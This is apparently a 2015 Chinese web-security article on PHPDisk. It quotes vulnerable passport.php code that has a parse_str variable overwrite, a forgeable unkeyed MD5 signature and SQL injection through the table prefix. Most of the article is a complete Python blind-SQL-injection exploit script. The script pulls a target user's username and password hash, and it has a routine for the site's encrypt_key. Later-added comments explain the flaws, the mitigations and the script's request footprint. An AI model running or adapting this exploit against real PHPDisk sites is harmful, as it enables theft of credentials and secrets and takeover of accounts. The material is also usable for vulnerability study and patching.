

phpdisk 盲注 &前台任意用户登录 - 网站安全 -

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] 代码审核文件 plugins\phpdisk_client\passport.php：$str = $_SERVER['QUERY_STRING']; if($str){ parse_str(base64_decode($str));// 触发函数 }else{ exit('Error Pa......

代码审核

文件 plugins\phpdisk_client\passport.php

// The whole raw query string is treated as a single base64 blob.
$str = $_SERVER['QUERY_STRING'];

if($str){
    // Trigger point: parse_str() called without a result array writes every
    // decoded key=value pair straight into this scope, so the sender chooses
    // the values of $username, $password, $action, $sign and $tpf (and any
    // other variable this file later reads). Mitigation: pass a result array
    // (parse_str($s, $params)) and read only the keys you expect from it.
    parse_str(base64_decode($str));// trigger function
}else{
    exit('Error Param');
}
// These gpc() reads are commented out, so the three values below come only
// from the parse_str() call above.
/*$username = trim(gpc('username','G',''));
$password = trim(gpc('password','G',''));
$sign = trim(gpc('sign','G',''));*/

// Signature check over values the sender supplied, with no server-side
// secret in the digest: whoever builds the request can also compute a
// matching $sign, so this does not authenticate the request. A keyed
// digest (server-held secret included) would make $sign unforgeable.
if($sign!=strtoupper(md5($action.$username.$password))){
    exit('No data,Code:2!');
}

// Presumably a charset conversion of the sender-supplied username (gbk -> utf-8);
// is_utf8()/convert_str() are project helpers not shown here.
$username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username;
  
if($action=='passportlogin'){ 
  
    $rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1");  //覆盖tpf 


phpdisk.py exploit

 

#=============================================================================== 
# Id :phpdisk.y 
# Author:Yaseng 
#=============================================================================== 
import   sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib 
  
def cslogo(): 
    """Print the tool banner (name, author and usage line) to stdout."""
    print ''' 
  ___  ___  ____  ____  ____  __      __   _  _ 
 / __)/ _ \(  _ \( ___)(  _ \(  )    /__\ ( \/ ) 
( (__( (_) ))(_) ))__)  )___/ )(__  /(__)\ \  / 
 \___)\___/(____/(____)(__)  (____)(__)(__)(__) 
 Name:phpdisk bind sql injection  exploit 
 Author:Yaseng [yaseng@uauc.net] 
 Usage:phpdisk.py  site[www.yaseng.me]   id[1] 
''' 
  
# show message 
def msg(text, type=0):
    """Write *text* to stdout behind a status prefix, followed by a newline.

    type 0 -> "[*]" (info), 1 -> "[+]" (success), anything else -> "[-]".
    The parameter is named ``type`` for compatibility with existing callers.
    """
    prefix = "[*]" if type == 0 else ("[+]" if type == 1 else "[-]")
    sys.stdout.write(prefix + text + "\n")
  
# get url data 
def get_data(url): 
    try: 
      r = urllib2.urlopen(url, timeout=10) 
      return r.read() 
    except : 
     return 0
def b(url): 
     """Boolean oracle for the blind probes.

     Returns 0 when the page at *url* contains the substring "ssport Err"
     (presumably the plugin's error text for a failed lookup) and 1 otherwise.
     NOTE: get_data() returns 0 on any request failure, and 0 has no .find(),
     so a failed request raises AttributeError here instead of returning 0.
     """
     if   get_data(url).find("ssport Err",0) != -1 : 
        return 0
     return 1
  
def make_plyload(payload): 
     """Build the passport.php URL for one probe.

     The query string is a base64 blob of username=1, password=1,
     action=passportlogin, tpf=<payload> and sign=MD5("passportlogin"+"1"+"1")
     uppercased -- the same digest the PHP side recomputes from the sender's
     own values, which is why the check there offers no protection. *payload*
     lands in the ``{$tpf}`` table-prefix position of the users query.
     Reads the module-level ``target`` assigned in ``__main__``.
     """
     return   target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())  
  
def get_username(): 
    """Recover the username of user ``uid`` one character per probe.

    Each probe is one HTTP request through b()/make_plyload(); the payload
    ends in ``#`` so the trailing ``users`` of ``{$tpf}users`` is commented
    out. First the length is found (LENGTH(username) compared against
    0..39), then each position is compared against digits and lowercase
    ASCII letters. A character outside that alphabet is silently skipped,
    so the returned string can be shorter than the real name. For defenders,
    the footprint is a burst of up to 36 requests per character to
    passport.php with base64-encoded query strings.
    Uses the module-level ``uid`` set in ``__main__``.
    """
  
    msg("get  username ...") 
    global  pass_list 
    # NOTE: shadows the builtin len() inside this function; stays 0 if no
    # length in 0..39 matched, in which case the loop below runs zero times.
    len=0
    for i in range(40) : 
         if  b(make_plyload("pd_users  WHERE 1   and   (SELECT  LENGTH(username)  from  pd_users where userid=%d )= %d  #" % (uid,i))): 
            len=i 
            msg("username length:%d" % len,1) 
            break
    global  key_list 
    # Candidate alphabet: '0'-'9' plus 'a'-'z' (chr 97..122).
    key_list=['0','1','2','3','4','5','6','7','8','9'] 
    key_list+=map(chr,range(97,123)) 
    username="" 
    for i  in range(len) : 
       for key in key_list : 
            t=key 
            # Every key is a 1-char str, so this branch always runs and the
            # comparison value is sent as a 0x.. hex literal.
            if type(key) != int : 
                t="0x"+binascii.hexlify(key) 
            if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(username,%d,1)   from  pd_users  where userid=%d )=%s #" % (i+1,uid,t)))) : 
             msg("username [%d]:%s" % (i+1,key)) 
             username+=key 
             break
    msg("username:"+username,1) 
    return  username  
  
def get_password():    
     """Recover the 32-character stored password hash of user ``uid``.

     Probes each of 32 positions against the hex alphabet 0-9a-f (the
     caller in ``__main__`` treats exactly 32 recovered characters as
     success, consistent with an MD5 hex digest -- not confirmed here).
     ``pass_list`` here is a local and does not touch the module-level
     name of the same spelling. Uses the module-level ``uid``.
     NOTE: the final status line is labelled "username:" but prints the
     password; left as is since this edit changes comments only.
     """
  
     pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'] 
     password="" 
     for i  in range(32) : 
        for key in pass_list : 
             t=key 
             # Always true for 1-char str keys: compare as a 0x.. hex literal.
             if type(key) != int : 
                 t="0x"+binascii.hexlify(key) 
             if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(password,%d,1)     from  pd_users  where userid=%d )= %s #" % (i+1,uid,t)))) : 
              msg("password [%d]:%s" % (i+1,key)) 
              password+=key 
              break
     msg("username:"+password,1) 
     return password      
  
def get_encrypt_key(): 
    """Recover the ``encrypt_key`` row of pd_settings, one character per probe.

    ``0x656e63727970745f6b6579`` is the hex encoding of the string
    "encrypt_key". The length is found first (0..39), then each position is
    compared with ``binary(substr(...))`` so the match is case-sensitive,
    which is why the alphabet here also includes 'A'-'Z'. Not called from
    ``__main__`` in this file.
    """
  
    msg("get encrypt_key ...") 
    global  pass_list 
    # Assigned but not read in this function (key_list is what the loops use).
    pass_list=map(chr,range(97,123)) 
    # NOTE: shadows the builtin len() inside this function.
    len=0
    for i in range(40) : 
        # The "23" after "#" is just part of the SQL comment.
        if  b(make_plyload("pd_users  WHERE 1   and   ( SELECT  LENGTH(value)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )=%d  #23" % i)): 
            len=i 
            msg("encrypt_key length:%d" % len,1) 
            break
    global  key_list 
    # Candidate alphabet: '0'-'9', 'A'-'Z' (65..90) and 'a'-'z' (97..122).
    key_list=['0','1','2','3','4','5','6','7','8','9'] 
    key_list+=map(chr,range(65,91)+range(97,123)) 
    encrypt_key="" 
    for i  in range(len) : 
       for key in key_list : 
         t=key 
         # Always true for 1-char str keys: compare as a 0x.. hex literal.
         if type(key) != int : 
            t="0x"+binascii.hexlify(key) 
         if(b(make_plyload(" pd_users WHERE 1   and   ( SELECT  binary(substr(value,%d,1))  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = %s #" % (i+1,t)))) : 
          msg("key [%d]:%s" % (i+1,key)) 
          encrypt_key+=key 
          break
    msg("encrypt_key:"+encrypt_key,1) 
    return  encrypt_key  
  
# Entry point: phpdisk.py <site> [uid]. Sets the module-level ``target`` and
# ``uid`` read by make_plyload() and the get_* functions, then runs the
# username and password extraction. get_encrypt_key() is never invoked here.
if __name__ == '__main__': 
  
   cslogo() 
   if len(sys.argv) > 1 : 
    site=sys.argv[1]; 
    # ``global`` at module level is a no-op; these names are plain globals.
    global target 
    global uid 
    # uid defaults to 1 when argv[2] is missing or not an integer (the
    # catch-all also swallows any other error here).
    try : 
     uid=int(sys.argv[2]); 
    except : 
      uid =1
    target=site+"/plugins/phpdisk_client/passport.php"
    msg("exploit:"+site) 
   #print get_data(make_plyload(" pd_users WHERE 1   and   ( SELECT  substr(value,2,1)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = 9 %23")) 
    # A falsy fetch of the plugin page (request failure or empty body) is
    # taken to mean the endpoint is absent.
    if get_data(target) : 
       username=get_username() 
       if len(username) > 0 : 
         password=get_password() 
         # Exactly 32 characters recovered is the success criterion.
         if len(password) == 32 : 
            msg("Succeed: username:%s  password:%s" % (username,password),1) 
    else : 
       msg("vulnerability  not  exits",2); 
       exit();

使用演示



 
